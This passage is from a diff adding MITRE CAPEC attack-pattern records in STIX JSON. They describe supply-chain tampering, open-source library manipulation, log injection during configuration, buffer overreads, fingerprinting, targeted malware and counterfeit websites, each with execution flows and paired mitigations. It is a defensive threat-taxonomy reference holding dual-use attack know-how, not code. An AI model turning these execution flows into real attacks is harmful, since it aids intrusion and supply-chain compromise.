"http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + } + ], + "id": "attack-pattern--be032a5f-7575-4e82-86d8-6c5cabb3d9dd", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Data Injected During Configuration", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f9f65fdd-5857-4a57-a725-066465397601" + ], + "x_capec_domains": [ + "Supply Chain", + "Software" + ], + "x_capec_example_instances": [ + "An adversary wishes to bypass a security system to access an additional network segment where critical data is kept. The adversary knows that some configurations of the security system will allow for remote bypass under certain conditions, such as switching a specific parameter to a different value. The adversary knows the bypass will work but also will be detected within the logging data of the security system. The adversary waits until an upgrade is performed to the security system by the victim's system administrators, and the adversary has access to an external logging system. The adversary injects false log entries that cause the administrators to think there are two different error states within the security system - one involving the specific parameter and the other involving the logging entries. The specific parameter is adjusted to a different value, and the logging level is reduced to a lower level that will not cause an adversary bypass to be detected. The adversary stops injecting false log data, and the administrators of the security system believe the issues were caused by the upgrade and are now resolved. The adversary is then able to bypass the security system." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine configuration process: The adversary, through a previously compromised system, either remotely or physically, determines what the configuration process is. They look at configuration files, data files, and running processes on the system to identify areas where they could inject malicious data.

  2. Determine when configuration occurs: The adversary needs to then determine when configuration or recalibration of a system occurs so they know when to inject malicious data.

    3. Techniques
    Look for a weekly update cycle or repeated update schedule.
    Insert a malicious process into the target system that notifies the adversary when configuration is occurring.

Experiment

  1. Determine malicious data to inject: By looking at the configuration process, the adversary needs to determine what malicious data they want to insert and where to insert it.

    2. Techniques
    Add false log data
    Change configuration files
    Change data files

Exploit

  1. Inject malicious data: Right before, or during system configuration, the adversary injects the malicious data. This leads to the system behaving in a way that is beneficial to the adversary and is often followed by other attacks.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The attacker must have previously compromised the victim's systems or have physical access to the victim's systems.", + "Advanced knowledge of software and hardware capabilities of a manufacturer's product." + ], + "x_capec_skills_required": { + "High": "Ability to generate and inject false data into operational data into a system with the intent of causing the victim to alter the configuration of the system." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Ensure that proper access control is implemented on all systems to prevent unauthorized access to system files and processes.", + "id": "course-of-action--5a991a71-810a-4fb9-ba49-7ad88b6ccca5", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-536-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--bb32fca6-85ac-4fed-ab7a-d07e0bf5d9bb", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5a991a71-810a-4fb9-ba49-7ad88b6ccca5", + "spec_version": "2.1", + "target_ref": "attack-pattern--be032a5f-7575-4e82-86d8-6c5cabb3d9dd", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, leveraging the ability to manipulate components of primary support systems and tools within the development and production environments, inserts malicious software within the hardware and/or firmware development environment. The infiltration purpose is to alter developed hardware components in a system destined for deployment at the victim's organization, for the purpose of disruption or further compromise.", + "external_references": [ + { + "external_id": "CAPEC-537", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/537.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + }, + { + "description": "Cristin Goodwin, Joram Borenstein, Guarding against supply chain attacks—Part 2: Hardware risks, 2020--02---03, Microsoft", + "external_id": "REF-712", + "source_name": "reference_from_CAPEC", + "url": "https://www.microsoft.com/security/blog/2020/02/03/guarding-against-supply-chain-attacks-part-2-hardware-risks/" + } + ], + "id": "attack-pattern--7fb3fea4-e993-49f7-8c36-d58dd5038ad8", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Infiltration of Hardware Development Environment", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "\n The adversary, knowing the manufacturer runs email on a system adjacent to the hardware development systems used for hardware and/or firmware design, sends a phishing email with a malicious attachment to the manufacturer. When viewed, the malicious attachment installs a backdoor that allows the adversary to remotely compromise the adjacent hardware development system from the manufacturer's workstation. The adversary is then able to exfiltrate and alter sensitive data on the hardware system, allowing for future compromise once the developed system is deployed at the victim location.\n " + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The victim must use email or removable media from systems running the IDE (or systems adjacent to the IDE systems).", + "The victim must have a system running exploitable applications and/or a vulnerable configuration to allow for initial infiltration.", + "The adversary must have working knowledge of some if not all of the components involved in the IDE system as well as the infrastructure." + ], + "x_capec_skills_required": { + "High": "Development skills to construct malicious attachments that can be used to exploit vulnerabilities in typical desktop applications or system configurations. The malicious attachments should be crafted well enough to bypass typical defensive systems (IDS, anti-virus, etc)", + "Medium": "Intelligence about the manufacturer's operating environment and infrastructure." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Verify software downloads and updates to ensure they have not been modified be adversaries", + "id": "course-of-action--aba55887-195f-49b2-b2cf-5d26b34dd710", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-537-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7ffabfce-822a-4165-a38e-cb6682cc1b01", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--aba55887-195f-49b2-b2cf-5d26b34dd710", + "spec_version": "2.1", + "target_ref": "attack-pattern--7fb3fea4-e993-49f7-8c36-d58dd5038ad8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Leverage antivirus tools to detect known malware", + "id": "course-of-action--ba680e4a-b82b-479e-9903-4a8807c52c60", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-537-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--6363da74-7aae-401b-8cc9-8f0dc0419658", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ba680e4a-b82b-479e-9903-4a8807c52c60", + "spec_version": "2.1", + "target_ref": "attack-pattern--7fb3fea4-e993-49f7-8c36-d58dd5038ad8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Do not download software from untrusted sources", + "id": "course-of-action--557960a1-b40a-4a60-8750-d1649c2bbea2", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-537-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--7c96fb42-fe4c-4ecc-a424-bf85159f9b92", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--557960a1-b40a-4a60-8750-d1649c2bbea2", + "spec_version": "2.1", + "target_ref": "attack-pattern--7fb3fea4-e993-49f7-8c36-d58dd5038ad8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Educate designers, developers, engineers, etc. on social engineering attacks to avoid downloading malicious software via attacks such as phishing attacks", + "id": "course-of-action--0ba5f98c-6878-4132-908b-4b27bd6e56c3", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-537-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--dc17b843-2585-4684-b2b8-386159db9f64", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0ba5f98c-6878-4132-908b-4b27bd6e56c3", + "spec_version": "2.1", + "target_ref": "attack-pattern--7fb3fea4-e993-49f7-8c36-d58dd5038ad8", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversaries implant malicious code in open source software (OSS) libraries to have it widely distributed, as OSS is commonly downloaded by developers and other users to incorporate into software development projects. The adversary can have a particular system in mind to target, or the implantation can be the first stage of follow-on attacks on many systems.", + "external_references": [ + { + "external_id": "CAPEC-538", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/538.html" + }, + { + "external_id": "CWE-494", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/494.html" + }, + { + "external_id": "CWE-829", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/829.html" + }, + { + "description": "Supply Chain Compromise: Software Dependencies and Development Tools", + "external_id": "T1195.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/001" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + } + ], + "id": "attack-pattern--ca626464-877a-4f42-83b7-7451cfe71a38", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Open-Source Library Manipulation", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "An adversary with access to an open source code project introduces a hard-to-find bug in the software that allows under very specific conditions for encryption to be disabled on data streams. The adversary commits the change to the code which is picked up by a manufacturer who develops VPN software. It is eventually deployed at the victim's location where the very specific conditions are met giving the adversary the ability to sniff plaintext traffic thought to be encrypted. This can provide to the adversary access to sensitive data of the victim." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine the relevant open-source code project to target: The adversary will make the selection based on various criteria:

Experiment

  1. Develop a plan for malicious contribution: The adversary develops a plan to contribute malicious code, taking the following into consideration:

Exploit

  1. Execute the plan for malicious contribution: Write the code to be contributed based on the plan and then submit the contribution. Multiple commits, possibly using multiple identities, will help obscure the attack. Monitor the contribution site to try to determine if the code has been uploaded to the target system.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "Access to the open source code base being used by the manufacturer in a system being developed or currently deployed at a victim location." + ], + "x_capec_skills_required": { + "High": "Advanced knowledge about the inclusion and specific usage of an open source code project within system being targeted for infiltration." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker with access to the development environment process of an application-specific integrated circuit (ASIC) for a victim system being developed or maintained after initial deployment can insert malicious functionality into the system for the purpose of disruption or further compromise.", + "external_references": [ + { + "external_id": "CAPEC-539", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/539.html" + }, + { + "description": "Supply Chain Compromise: Compromise Hardware Supply Chain", + "external_id": "T1195.003", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1195/003" + }, + { + "description": "John F. Miller, Supply Chain Attack Framework and Attack Patterns, 2013, The MITRE Corporation", + "external_id": "REF-439", + "source_name": "reference_from_CAPEC", + "url": "http://www.mitre.org/sites/default/files/publications/supply-chain-attack-framework-14-0228.pdf" + } + ], + "id": "attack-pattern--bfb711d6-f12d-496e-88b9-2c0184485976", + "modified": "2022-09-29T00:00:00.000Z", + "name": "ASIC With Malicious Functionality", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--efb74200-657d-438c-aaff-bbd9644dd72d" + ], + "x_capec_domains": [ + "Supply Chain", + "Hardware" + ], + "x_capec_example_instances": [ + "A hardware manufacturer periodically updates its ASIC with new features. The attacker, knowing the manufacturer runs email on a system adjacent to the hardware development systems used for ASIC design, sends a phishing email with a malicious attachment to the manufacturer. When viewed, the malicious attachment installs a backdoor that allows the attacker to remotely compromise the adjacent ASIC development system. The attacker is then able to exfiltrate and alter sensitive data on the ASIC system, allowing for future compromise once a new AISC is deployed at the victim location." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The attacker must have working knowledge of some if not all of the components involved in the target system as well as the infrastructure and development environment of the manufacturer.", + "Advanced knowledge about the ASIC installed within the target system." + ], + "x_capec_skills_required": { + "High": "Able to develop and manufacture malicious subroutines for an ASIC environment without degradation of existing functions and processes." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary, aware of an application's location (and possibly authorized to use the application), probes an application's structure and evaluates its robustness by submitting requests and examining responses. Often, this is accomplished by sending variants of expected queries in the hope that these modified queries might return information beyond what the expected set of queries would provide.", + "external_references": [ + { + "external_id": "CAPEC-54", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/54.html" + }, + { + "external_id": "CWE-209", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/209.html" + } + ], + "id": "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Query System for Information", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Blind SQL injection is an example of this technique, applied to successful exploit. See also: CVE-2006-4705", + "\n Attacker sends bad data at various servlets in a J2EE system, records returned exception stack traces, and maps application functionality.\n In addition, this technique allows attackers to correlate those servlets used with the underlying open source packages (and potentially version numbers) that provide them.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine parameters: Determine all user-controllable parameters of the application either by probing or by finding documentation

Experiment

  1. Cause error condition: Inject each parameter with content that causes an error condition to manifest

  2. Modify parameters: Modify the content of each parameter according to observed error conditions

Exploit

  1. Follow up attack: Once the above steps have been repeated with enough parameters, the application will be sufficiently mapped out. The adversary can then launch a desired attack (for example, Blind SQL Injection)

", + "x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--62c46d1c-f091-467e-a4b0-61927db31f38", + "attack-pattern--b5618a54-4646-423d-8676-b2eb56dd4328", + "attack-pattern--ce75149a-6882-4b07-8841-db9d6a9ec20d", + "attack-pattern--5871f734-1898-4509-860c-f418cdf6b2ac", + "attack-pattern--165b75a3-3e50-492c-8f1a-af979dc5af12" + ], + "x_capec_prerequisites": [ + "This class of attacks does not strictly require authorized access to the application. As Attackers use this attack process to classify, map, and identify vulnerable aspects of an application, it simply requires hypotheses to be verified, interaction with the application, and time to conduct trial-and-error activities." + ], + "x_capec_resources_required": [ + "\n The Attacker needs the ability to probe application functionality and provide it erroneous directives or data without triggering intrusion detection schemes or making enough of an impact on application logging that steps are taken against the adversary.\n The Attack does not need special hardware, software, skills, or access.\n " + ], + "x_capec_skills_required": { + "Medium": "Although fuzzing parameters is not difficult, and often possible with automated fuzzers, interpreting the error conditions and modifying the parameters so as to move further in the process of mapping the application requires detailed knowledge of target platform, the languages and packages used as well as software design." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Application designers can construct a 'code book' for error messages. When using a code book, application error messages aren't generated in string or stack trace form, but are cataloged and replaced with a unique (often integer-based) value 'coding' for the error. Such a technique will require helpdesk and hosting personnel to use a 'code book' or similar mapping to decode application errors/logs in order to respond to them normally.", + "id": "course-of-action--031e02fe-84e7-4908-b507-e836876da1ab", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-54-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--04308827-581a-464a-8378-efed9a9a7476", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--031e02fe-84e7-4908-b507-e836876da1ab", + "spec_version": "2.1", + "target_ref": "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Application designers can wrap application functionality (preferably through the underlying framework) in an output encoding scheme that obscures or cleanses error messages to prevent such attacks. Such a technique is often used in conjunction with the above 'code book' suggestion.", + "id": "course-of-action--c001766e-e441-4291-8f06-f59957360fde", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-54-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--60cbe06e-8a08-42af-a4ab-f81130b139ce", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--c001766e-e441-4291-8f06-f59957360fde", + "spec_version": "2.1", + "target_ref": "attack-pattern--49132d37-44e8-458c-a06e-0e5b9ac9bbd6", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary attacks a target by providing input that causes an application to read beyond the boundary of a defined buffer. This typically occurs when a value influencing where to start or stop reading is set to reflect positions outside of the valid memory location of the buffer. This type of attack may result in exposure of sensitive information, a system crash, or arbitrary code execution.", + "external_references": [ + { + "external_id": "CAPEC-540", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/540.html" + }, + { + "external_id": "CWE-125", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/125.html" + } + ], + "id": "attack-pattern--40eddae8-4d7d-4fc3-b220-1c9706f01a96", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Overread Buffers", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--476ca631-2695-43f8-82f6-83c06a07ae36" + ], + "x_capec_consequences": { + "Availability": [ + "Unreliable Execution (Depending on the use of the target buffer, an application or system crash can be achieved.)" + ], + "Confidentiality": [ + "Read Data (By reading outside the boundary of the intended buffer, the adversary is potentially able to see any data that is stored on the disk. This could include secret keys, personal information, and sensitive files.)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify target application: The adversary identifies a target application or program to perform the buffer overread on. Adversaries often look for applications that accept user input and that perform manual memory management.

Experiment

  1. Find attack vector: The adversary identifies an attack vector by looking for areas in the application where they can specify to read more data than is required.

Exploit

  1. Overread the buffer: The adversary provides input to the application that gets it to read past the bounds of a buffer, possibly revealing sensitive information that was not intended to be given to the adversary.

", + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "For this type of attack to be successful, a few prerequisites must be met. First, the targeted software must be written in a language that enables fine grained buffer control. (e.g., c, c++) Second, the targeted software must actually perform buffer operations and inadequately perform bounds-checking on those buffer operations. Finally, the adversary must have the capability to influence the input that guides these buffer operations." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary engages in fingerprinting activities to determine the type or version of an application installed on a remote target.", + "external_references": [ + { + "external_id": "CAPEC-541", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/541.html" + }, + { + "external_id": "CWE-204", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/204.html" + }, + { + "external_id": "CWE-205", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/205.html" + }, + { + "external_id": "CWE-208", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/208.html" + }, + { + "description": "Gather Victim Host Information: Software", + "external_id": "T1592.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1592/002" + } + ], + "id": "attack-pattern--e7eec058-4cd9-4fa0-8784-ed961d8d7290", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Application Fingerprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--76e6fe1e-34f2-40cd-8f12-f4d4f9c41808" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--0cf857f6-afa4-4f0c-850f-58a4f11df157", + "attack-pattern--8b7dfd02-8d21-4eed-a2a3-d9f73ed49a48", + "attack-pattern--29e8786c-a791-44c6-b1de-950cf0604643" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary develops targeted malware that takes advantage of a known vulnerability in an organizational information technology environment. The malware crafted for these attacks is based specifically on information gathered about the technology environment. Successfully executing the malware enables an adversary to achieve a wide variety of negative technical impacts.", + "external_references": [ + { + "external_id": "CAPEC-542", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/542.html" + }, + { + "description": "Develop Capabilities: Malware", + "external_id": "T1587.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1587/001" + }, + { + "description": "Obfuscated Files or Information", + "external_id": "T1027", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027" + } + ], + "id": "attack-pattern--482cb9fc-0122-49f0-b6df-6d2d42098b0a", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Targeted Malware", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_can_follow_refs": [ + "attack-pattern--9250f041-d55b-4610-aff0-979b5800dc18" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--558870ad-9433-4e39-a0b0-d9b5c4691862" + ], + "x_capec_child_of_refs": [ + "attack-pattern--2c74d7f3-ccb4-4aea-b7fc-8a4da900ec80" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--aef8e9e0-4714-4890-9470-06276c61abfd", + "attack-pattern--13e147c3-7baa-4ec4-aafd-9135d46545cc", + "attack-pattern--79037ec7-444c-42cb-a64b-fb4b4f6bd156", + "attack-pattern--ccb9c607-8bfe-4141-8843-356453179da7", + "attack-pattern--d9069913-2a5f-4ad5-878e-73181f0b1067", + "attack-pattern--b63b2869-11e6-4849-8ddf-ae2557bf554b", + "attack-pattern--9927fda8-927b-4327-b3f8-bcbd0467c702", + "attack-pattern--260a8cb6-a7df-4dc5-a057-8a00aa69de7e" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Adversary creates duplicates of legitimate websites. When users visit a counterfeit site, the site can gather information or upload malware.", + "external_references": [ + { + "external_id": "CAPEC-543", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/543.html" + }, + { + "description": "Masquerading: Match Legitimate Name or Location", + "external_id": "T1036.005", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1036/005" + } + ], + "id": "attack-pattern--0d249bf9-13b3-4c13-9423-bcb1ea73c067", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Counterfeit Websites", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--a69b641a-dff7-4dad-b9b1-e00f80b083a2", + "attack-pattern--b6f0fd7e-6068-4557-976c-fd34914b11bf", + "attack-pattern--a2cad567-3a04-4ef3-8b62-25924c93b53f", + "attack-pattern--c4e18b3f-0445-49e8-9bf1-d47a23082501", + "attack-pattern--a00c2cc2-bd4f-4594-9ec1-b021b62ac896" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--5dec633b-7b10-4bfe-9270-e68b98112285" + ], + "x_capec_child_of_refs": [ + "attack-pattern--862d18f1-a87c-4f1b-acc2-882697d5d6e5" + ], + "x_capec_domains": [ + "Social Engineering" + ], + "x_capec_prerequisites": [ + "None" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary creates a false front organizations with the appearance of a legitimate supplier in the critical life cycle path that then injects corrupted/malicious information system components into the organizational supply chain.", + "external_references": [ + { + "external_id": "CAPEC-544", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/544.html" + } + ], + "id": "attack-pattern--996aa0f7-950e-4435-a60d-ae859e545101", + "modified": 